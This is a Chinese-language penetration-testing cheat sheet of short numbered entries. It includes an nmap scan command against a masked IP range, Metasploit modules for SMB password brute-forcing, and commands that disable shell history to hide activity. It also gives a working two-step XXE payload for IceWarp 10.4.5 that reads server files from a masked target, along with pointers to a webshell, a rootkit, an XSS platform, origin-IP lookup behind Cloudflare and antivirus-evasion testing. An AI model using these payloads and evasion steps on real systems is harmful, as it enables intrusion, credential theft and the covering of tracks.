0x1 渗透测试信息搜集
https://bbs.ichunqiu.com/thread-16020-1-1.htm
0x2 nmap 扫描常用端口命令
nmap -sT -P0 -sV -O --script=banner -p T:21-25,80-89,110,143,443,513,873,1080,1433,1521,1158,3306-3308,3389,3690,5900,6379,7001,8000-8090,9000,9418,27017-27019,50060,111,11211,2049 -oN name.txt 5*.1**.8.*
0x3 在线xss平台
http://webxss.top/xss/
0x4 接入kali的渗透准备
infomation gathering
https://www.offensive-security.com/metasploit-unleashed/hunting-mssql/
smb_version
search portscan
auxiliary/scanner/portscan/tcp
auxiliary/scanner/portscan/syn
1)
domain admins brute password
smb_login module
2)
gpp password
3)
port service web
0x5 linux无记录渗透
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
0x6 icewarp 10.4.5xxe injection
target:https://mail.***.com/rpc/gw.html
post下面的payload
分两步走第一步得到value,填入第二步
验证目录c:/windows/win.ini
icewarp默认安装目录如下
c:/PROGRA~2/IceWarp/config/domains.cfg
c:/PROGRA~2/IceWarp/config/***/users.cfg
***从第一个目录读出来的domain site
users.cfg已加密
payload1:
<?xml version="1.0"?>
<methodCall>
<methodName>LoginUser</methodName>
<params>
<param><value></value></param>
</params>
</methodCall>
90ae4b8c70ba07ab8c82024a488b3da6
payload2:
<?xml version="1.0"?>
<!DOCTYPE OpenVAS [<!ENTITY bar SYSTEM "php://filter/read=convert.base64-encode/resource=c:/windows/win.ini">]>
<methodCall>
<methodName>ConvertVersit</methodName>
<params>
<param><value>90ae4b8c70ba07ab8c82024a488b3da6</value></param>
<param><value>OpenVAS;&bar;</value></param>
<param><value>XML</value></param>
</params>
</methodCall>
0x7 burpsuite抓https
网络设置设置成适合所有协议,在浏览器网络设置里把勾打上
buresuie
proxy->options->edit->certificate->use a self-signed certificates
0x8 cloundfare查询真实ip
http://www.crimeflare.com/cfs.html#box
0x9 文件包含漏洞webshell
b374k
0x10 查询相同服务器上的其他网站
http://www.yougetsignal.com/tools/web-sites-on-web-server/
0x11 linux rootkit
Beurk
0x12 不上传测试查杀情况
nodistribute.com